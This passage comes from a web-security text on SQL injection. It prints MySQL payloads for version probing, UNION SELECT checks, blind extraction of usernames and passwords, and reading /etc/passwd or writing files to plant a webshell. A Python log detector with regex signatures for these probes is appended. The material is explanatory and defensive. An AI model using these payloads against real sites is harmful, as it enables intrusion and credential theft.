Through SQL injection, the attacker can guess the version of the database. For example, with the following payload, if the MySQL major version is 4, the condition evaluates to TRUE:
http://www.site.com/news.php?id=5 and substring(@@version,1,1)=4
The following payloads use UNION SELECT to confirm whether a table named admin exists and whether it has a column named passwd:
id=5 union all select 1,2,3 from admin
id=5 union all select 1,2,passwd from admin
In addition, if you want to guess the value of the username and password, you can read them out step-by-step based on the range of characters:
id=5 and ascii(substring((select concat(username,0x3a,passwd) from users limit 0,1),1,1))>64 /*ret true*/
id=5 and ascii(substring((select concat(username,0x3a,passwd) from users limit 0,1),1,1))>96 /*ret true*/
id=5 and ascii(substring((select concat(username,0x3a,passwd) from users limit 0,1),1,1))>100 /*ret false*/
id=5 and ascii(substring((select concat(username,0x3a,passwd) from users limit 0,1),1,1))>97 /*ret false*/ ...
id=5 and ascii(substring((select concat(username,0x3a,passwd) from users limit 0,1),2,1))>64 /*ret true*/ ...
This process is very tedious, so an automated tool is needed to carry it out. sqlmap is a very good automated injection tool.
In injection attacks, file read and write techniques are often used. For example, in MySQL, LOAD_FILE() reads system files and INTO DUMPFILE writes a local file. Of course, this requires that the current database user has permission to read and write the corresponding file or directory.
… union select 1,1, LOAD_FILE('/etc/passwd'),1,1;
If you want to read the file and return the result to the attacker, you can use the following techniques:
CREATE TABLE potatoes(line BLOB);
UNION SELECT 1,1, HEX(LOAD_FILE('/etc/passwd')),1,1 INTO DUMPFILE '/tmp/potatoes';
LOAD DATA INFILE '/tmp/potatoes' INTO TABLE potatoes;
This requires that the current database user has permission to create tables. First, LOAD_FILE() reads the system file; then INTO DUMPFILE writes it out to the file system; then LOAD DATA INFILE imports that file into a table; and finally, ordinary injection techniques can read the table data directly.
INTO OUTFILE has the same effect as INTO DUMPFILE. The difference is that DUMPFILE is intended for binary files, so the target content is written out as a single line; OUTFILE is better suited to text files.
File-writing techniques are often used to drop a webshell, paving the way for further attacks. Therefore, when designing database security, ordinary database users should not be granted permission to manipulate files.
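As an added example (not code from the original text), the probe families described in this section (version probing, UNION SELECT, character-by-character extraction with ascii(substring(...)), LOAD_FILE and INTO DUMPFILE/OUTFILE) turned into detection logic run over web-server access logs; the log lines, client addresses and signature names are constructed for this example.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

SIGNATURES = {  # one family per probe type described in this section
    "version_probe": re.compile(r"@@version\b", re.I),
    "union_select": re.compile(r"\bunion\b(\s+all)?\s+select\b", re.I),
    "blind_char_extract": re.compile(r"\bascii\s*\(\s*substr(?:ing)?\s*\(", re.I),
    "file_read": re.compile(r"\bload_file\s*\(", re.I),
    "file_write": re.compile(r"\binto\s+(?:dump|out)file\b", re.I),
}

def normalize(request):
    """URL-decode twice (catches double encoding) and turn /* */ comments, which MySQL treats as whitespace, into a space."""
    decoded = unquote_plus(unquote_plus(request))
    decoded = re.sub(r"/\*.*?\*/", " ", decoded)
    return re.sub(r"\s+", " ", decoded)

def classify(request):
    """Return the set of signature families matching one request line."""
    return {name for name, rx in SIGNATURES.items() if rx.search(normalize(request))}

def scan(log_lines):
    """Return (client_ip, request, matches) for every Common Log Format line that trips a signature."""
    hits = []
    for line in log_lines:
        fields = line.split('"')
        if len(fields) < 3:
            continue  # not a well-formed access-log line
        matches = classify(fields[1])
        if matches:
            hits.append((line.split(" ", 1)[0], fields[1], matches))
    return hits

def summarize(hits):
    """Per client: flagged-request count and families seen; many blind_char_extract hits from one client is the footprint of step-by-step extraction."""
    per_client = defaultdict(lambda: {"count": 0, "families": set()})
    for ip, _request, matches in hits:
        per_client[ip]["count"] += 1
        per_client[ip]["families"] |= matches
    return dict(per_client)

# Constructed sample log lines (not real traffic) mirroring the payloads in this section.
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Oct/2024:13:55:36 +0000] "GET /news.php?id=5 HTTP/1.1" 200 1420',
    '203.0.113.9 - - [10/Oct/2024:13:55:40 +0000] "GET /news.php?id=5%20and%20substring(@@version,1,1)=4 HTTP/1.1" 200 1420',
    '203.0.113.9 - - [10/Oct/2024:13:55:41 +0000] "GET /news.php?id=5%20union%20all%20select%201,2,passwd%20from%20admin HTTP/1.1" 200 1533',
    '203.0.113.9 - - [10/Oct/2024:13:55:42 +0000] "GET /news.php?id=5%20and%20ascii(substring((select%20concat(username,0x3a,passwd)%20from%20users%20limit%200,1),1,1))%3E64 HTTP/1.1" 200 1420',
    '203.0.113.9 - - [10/Oct/2024:13:55:50 +0000] "GET /news.php?id=5%20union/**/select%201,1,HEX(LOAD_FILE(%27/etc/passwd%27)),1,1%20into%20dumpfile%20%27/tmp/potatoes%27 HTTP/1.1" 200 1420',
]
```

Running summarize(scan(SAMPLE_LOG)) flags every request from 203.0.113.9 and none from the benign client; in production the per-client count is what separates a single stray probe from an extraction campaign.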